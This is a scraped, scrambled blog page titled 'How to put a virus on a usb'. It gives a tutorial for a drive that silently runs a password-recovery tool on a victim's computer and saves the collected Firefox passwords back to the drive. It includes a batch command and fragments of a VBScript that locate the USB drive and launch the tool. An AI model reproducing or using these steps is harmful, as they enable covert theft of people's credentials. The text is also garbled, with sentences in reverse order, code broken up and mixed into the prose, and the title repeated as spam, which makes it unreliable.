lesnobell.blogg.se

How to put a virus on a usb
How to put a virus on a usb










how to put a virus on a usb how to put a virus on a usb

You want to replace "PasswordFox.exe" with whatever program you downloaded. Start %~dp0PasswordFox.exe /shtml %~dp0firefox.html Then right click on it and select "edit". So right click in the USB drive and create a new text file and rename it "batch.bat". Lastly, we need to create a USB file that runs the program silently and stores the data it collects back on the USB drive. Just extract the files and copy them to your USB drive. You can find some good programs at "" that are good for retrieving passwords and information. Once you have that done, click save and exit and now we can burn this to our U3 drive. n oDrive.DriveLetter & ":\PasswordFox.exe"īasically what this script does is scan the computer for a USB drive and then executes a file called "batch.bat" from that USB drive. WScript.Echo "found usb at", oDrive.DriveLetter If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter "A" Then Set oFSO = WScript.CreateObject("Scripting.FileSystemObject") You want to type in this code:ĭim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell So, create another new text document and rename it to "usb.vbs". This will find the drive letter of the USB drive so that we can automatically save stuff to it.












How to put a virus on a usb